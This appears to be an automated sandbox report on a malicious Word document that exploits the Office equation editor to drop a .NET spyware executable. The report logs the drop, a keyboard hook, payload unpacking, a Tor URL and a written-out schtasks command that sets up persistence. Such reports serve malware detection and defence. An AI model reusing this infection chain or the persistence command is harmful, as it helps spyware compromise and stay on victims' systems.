Source: RegAsmbvbvcrtyjgh.exe, 00000007.00000002.2404353388.0000000002421000.00000004.00000001.sdmp	String found in binary or memory: https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha

Key, Mouse, Clipboard, Microphone and Screen Capturing:

Installs a global keyboard hook

Show sources

Source: C:\Users\user\AppData\Roaming\RegAsmbvbvcrtyjgh.exe

Windows user hook set: 0 keyboard low level C:\Users\user\AppData\Roaming\RegAsmbvbvcrtyjgh.exe

Jump to behavior

Source: C:\Users\user\AppData\Roaming\RegAsmbvbvcrtyjgh.exe

Window created: window name: CLIPBRDWNDCLASS

Jump to behavior

System Summary:

Office equation editor drops PE file

Show sources

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\6vWjC1g7qA0Z76f[1].exe			Jump to dropped file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\user\AppData\Roaming\RegAsmbvbvcrtyjgh.exe			Jump to dropped file

Source: C:\Users\user\AppData\Roaming\RegAsmbvbvcrtyjgh.exe	Memory allocated: 76E20000 page execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RegAsmbvbvcrtyjgh.exe	Memory allocated: 76D20000 page execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RegAsmbvbvcrtyjgh.exe	Memory allocated: 76E20000 page execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RegAsmbvbvcrtyjgh.exe	Memory allocated: 76D20000 page execute and read and write	Jump to behavior

Source: C:\Users\user\AppData\Roaming\RegAsmbvbvcrtyjgh.exe	Code function: 4_2_0027A230	4_2_0027A230
Source: C:\Users\user\AppData\Roaming\RegAsmbvbvcrtyjgh.exe	Code function: 4_2_00272A90	4_2_00272A90
Source: C:\Users\user\AppData\Roaming\RegAsmbvbvcrtyjgh.exe	Code function: 4_2_00270354	4_2_00270354
Source: C:\Users\user\AppData\Roaming\RegAsmbvbvcrtyjgh.exe	Code function: 4_2_00274120	4_2_00274120
Source: C:\Users\user\AppData\Roaming\RegAsmbvbvcrtyjgh.exe	Code function: 4_2_00274110	4_2_00274110
Source: C:\Users\user\AppData\Roaming\RegAsmbvbvcrtyjgh.exe	Code function: 4_2_00272A81	4_2_00272A81
Source: C:\Users\user\AppData\Roaming\RegAsmbvbvcrtyjgh.exe	Code function: 4_2_00274370	4_2_00274370
Source: C:\Users\user\AppData\Roaming\RegAsmbvbvcrtyjgh.exe	Code function: 4_2_00270FB0	4_2_00270FB0
Source: C:\Users\user\AppData\Roaming\RegAsmbvbvcrtyjgh.exe	Code function: 7_2_00402296	7_2_00402296
Source: C:\Users\user\AppData\Roaming\RegAsmbvbvcrtyjgh.exe	Code function: 7_2_002ECB70	7_2_002ECB70
Source: C:\Users\user\AppData\Roaming\RegAsmbvbvcrtyjgh.exe	Code function: 7_2_002E5340	7_2_002E5340
Source: C:\Users\user\AppData\Roaming\RegAsmbvbvcrtyjgh.exe	Code function: 7_2_002E6358	7_2_002E6358
Source: C:\Users\user\AppData\Roaming\RegAsmbvbvcrtyjgh.exe	Code function: 7_2_002E5688	7_2_002E5688
Source: C:\Users\user\AppData\Roaming\RegAsmbvbvcrtyjgh.exe	Code function: 7_2_002E2099	7_2_002E2099
Source: C:\Users\user\AppData\Roaming\RegAsmbvbvcrtyjgh.exe	Code function: 7_2_009E3440	7_2_009E3440
Source: C:\Users\user\AppData\Roaming\RegAsmbvbvcrtyjgh.exe	Code function: 7_2_009E71E0	7_2_009E71E0
Source: C:\Users\user\AppData\Roaming\RegAsmbvbvcrtyjgh.exe	Code function: 7_2_009EA930	7_2_009EA930
Source: C:\Users\user\AppData\Roaming\RegAsmbvbvcrtyjgh.exe	Code function: 7_2_009E0523	7_2_009E0523
Source: C:\Users\user\AppData\Roaming\RegAsmbvbvcrtyjgh.exe	Code function: 7_2_009EE8F0	7_2_009EE8F0
Source: C:\Users\user\AppData\Roaming\RegAsmbvbvcrtyjgh.exe	Code function: 7_2_009EAA74	7_2_009EAA74
Source: C:\Users\user\AppData\Roaming\RegAsmbvbvcrtyjgh.exe	Code function: 7_2_009EAFD0	7_2_009EAFD0

Source: classification engine

Classification label: mal100.troj.spyw.expl.evad.winDOC@8/15@10/2

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File created: C:\Users\user\Desktop\~$QUIRY_RFQ_20210208.doc

Jump to behavior

Source: C:\Users\user\AppData\Roaming\RegAsmbvbvcrtyjgh.exe

Mutant created: \Sessions\1\BaseNamedObjects\nHsffzSEBVJkrRScfUX

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File created: C:\Users\user\AppData\Local\Temp\CVRBF58.tmp

Jump to behavior

Source: C:\Windows\SysWOW64\schtasks.exe

Console Write: ........................................(.P..............................x................................................................$.....

Jump to behavior

Source: C:\Users\user\AppData\Roaming\RegAsmbvbvcrtyjgh.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll			Jump to behavior
Source: C:\Users\user\AppData\Roaming\RegAsmbvbvcrtyjgh.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll			Jump to behavior

Source: C:\Users\user\AppData\Roaming\RegAsmbvbvcrtyjgh.exe	WMI Queries: IWbemServices::CreateInstanceEnum - Win32_Processor
Source: C:\Users\user\AppData\Roaming\RegAsmbvbvcrtyjgh.exe	WMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Roaming\RegAsmbvbvcrtyjgh.exe	WMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Roaming\RegAsmbvbvcrtyjgh.exe	WMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Roaming\RegAsmbvbvcrtyjgh.exe	WMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Roaming\RegAsmbvbvcrtyjgh.exe	WMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Roaming\RegAsmbvbvcrtyjgh.exe	WMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Roaming\RegAsmbvbvcrtyjgh.exe	WMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Roaming\RegAsmbvbvcrtyjgh.exe	WMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Roaming\RegAsmbvbvcrtyjgh.exe	WMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Roaming\RegAsmbvbvcrtyjgh.exe	WMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Roaming\RegAsmbvbvcrtyjgh.exe	WMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Roaming\RegAsmbvbvcrtyjgh.exe	WMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Roaming\RegAsmbvbvcrtyjgh.exe	WMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Users\user\AppData\Roaming\RegAsmbvbvcrtyjgh.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RegAsmbvbvcrtyjgh.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RegAsmbvbvcrtyjgh.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior

Source: INQUIRY_RFQ_20210208.doc	Virustotal: Detection: 43%
Source: INQUIRY_RFQ_20210208.doc	ReversingLabs: Detection: 48%

Source: unknown	Process created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE 'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding
Source: unknown	Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
Source: unknown	Process created: C:\Users\user\AppData\Roaming\RegAsmbvbvcrtyjgh.exe C:\Users\user\AppData\Roaming\RegAsmbvbvcrtyjgh.exe
Source: unknown	Process created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\hEeIyOK' /XML 'C:\Users\user\AppData\Local\Temp\tmp8650.tmp'
Source: unknown	Process created: C:\Users\user\AppData\Roaming\RegAsmbvbvcrtyjgh.exe C:\Users\user\AppData\Roaming\RegAsmbvbvcrtyjgh.exe
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\user\AppData\Roaming\RegAsmbvbvcrtyjgh.exe C:\Users\user\AppData\Roaming\RegAsmbvbvcrtyjgh.exe	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RegAsmbvbvcrtyjgh.exe	Process created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\hEeIyOK' /XML 'C:\Users\user\AppData\Local\Temp\tmp8650.tmp'	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RegAsmbvbvcrtyjgh.exe	Process created: C:\Users\user\AppData\Roaming\RegAsmbvbvcrtyjgh.exe C:\Users\user\AppData\Roaming\RegAsmbvbvcrtyjgh.exe	Jump to behavior

Source: C:\Users\user\AppData\Roaming\RegAsmbvbvcrtyjgh.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}\InProcServer32

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Users\user\AppData\Roaming\RegAsmbvbvcrtyjgh.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Jump to behavior

Data Obfuscation:

.NET source code contains potential unpacker

Show sources

Source: 6vWjC1g7qA0Z76f[1].exe.2.dr, AssemblySignatureKeyAttribute/ComAliasNameAttribute.cs	.Net Code: .ctor System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: hEeIyOK.exe.4.dr, AssemblySignatureKeyAttribute/ComAliasNameAttribute.cs	.Net Code: .ctor System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 4.0.RegAsmbvbvcrtyjgh.exe.a50000.0.unpack, AssemblySignatureKeyAttribute/ComAliasNameAttribute.cs	.Net Code: .ctor System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 4.2.RegAsmbvbvcrtyjgh.exe.a50000.1.unpack, AssemblySignatureKeyAttribute/ComAliasNameAttribute.cs	.Net Code: .ctor System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 7.2.RegAsmbvbvcrtyjgh.exe.a50000.1.unpack, AssemblySignatureKeyAttribute/ComAliasNameAttribute.cs	.Net Code: .ctor System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 7.0.RegAsmbvbvcrtyjgh.exe.a50000.0.unpack, AssemblySignatureKeyAttribute/ComAliasNameAttribute.cs	.Net Code: .ctor System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])

Source: C:\Users\user\AppData\Roaming\RegAsmbvbvcrtyjgh.exe

Code function: 4_2_002787BE push ebp; retf

4_2_002787BF

Persistence and Installation Behavior:

Source: C:\Users\user\AppData\Roaming\RegAsmbvbvcrtyjgh.exe	File created: C:\Users\user\AppData\Roaming\hEeIyOK.exe	Jump to dropped file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\6vWjC1g7qA0Z76f[1].exe	Jump to dropped file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\user\AppData\Roaming\RegAsmbvbvcrtyjgh.exe	Jump to dropped file

Boot Survival:

Uses schtasks.exe or at.exe to add and modify task schedules

Show sources

Source: unknown

Process created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\hEeIyOK' /XML 'C:\Users\user\AppData\Local\Temp\tmp8650.tmp'

Hooking and other Techniques for Hiding and Protection:

Source: C:\Users\user\AppData\Roaming\RegAsmbvbvcrtyjgh.exe

Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RegAsmbvbvcrtyjgh.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RegAsmbvbvcrtyjgh.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RegAsmbvbvcrtyjgh.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RegAsmbvbvcrtyjgh.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RegAsmbvbvcrtyjgh.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RegAsmbvbvcrtyjgh.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RegAsmbvbvcrtyjgh.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RegAsmbvbvcrtyjgh.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RegAsmbvbvcrtyjgh.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RegAsmbvbvcrtyjgh.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RegAsmbvbvcrtyjgh.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RegAsmbvbvcrtyjgh.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RegAsmbvbvcrtyjgh.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RegAsmbvbvcrtyjgh.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RegAsmbvbvcrtyjgh.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RegAsmbvbvcrtyjgh.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RegAsmbvbvcrtyjgh.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RegAsmbvbvcrtyjgh.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RegAsmbvbvcrtyjgh.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RegAsmbvbvcrtyjgh.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RegAsmbvbvcrtyjgh.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RegAsmbvbvcrtyjgh.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RegAsmbvbvcrtyjgh.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RegAsmbvbvcrtyjgh.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RegAsmbvbvcrtyjgh.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RegAsmbvbvcrtyjgh.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RegAsmbvbvcrtyjgh.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RegAsmbvbvcrtyjgh.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RegAsmbvbvcrtyjgh.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RegAsmbvbvcrtyjgh.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RegAsmbvbvcrtyjgh.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RegAsmbvbvcrtyjgh.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RegAsmbvbvcrtyjgh.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RegAsmbvbvcrtyjgh.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RegAsmbvbvcrtyjgh.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RegAsmbvbvcrtyjgh.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RegAsmbvbvcrtyjgh.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RegAsmbvbvcrtyjgh.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RegAsmbvbvcrtyjgh.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RegAsmbvbvcrtyjgh.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RegAsmbvbvcrtyjgh.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RegAsmbvbvcrtyjgh.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RegAsmbvbvcrtyjgh.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RegAsmbvbvcrtyjgh.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RegAsmbvbvcrtyjgh.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RegAsmbvbvcrtyjgh.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RegAsmbvbvcrtyjgh.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RegAsmbvbvcrtyjgh.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RegAsmbvbvcrtyjgh.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RegAsmbvbvcrtyjgh.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RegAsmbvbvcrtyjgh.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RegAsmbvbvcrtyjgh.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RegAsmbvbvcrtyjgh.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RegAsmbvbvcrtyjgh.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RegAsmbvbvcrtyjgh.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RegAsmbvbvcrtyjgh.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RegAsmbvbvcrtyjgh.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RegAsmbvbvcrtyjgh.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RegAsmbvbvcrtyjgh.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RegAsmbvbvcrtyjgh.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RegAsmbvbvcrtyjgh.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RegAsmbvbvcrtyjgh.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RegAsmbvbvcrtyjgh.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
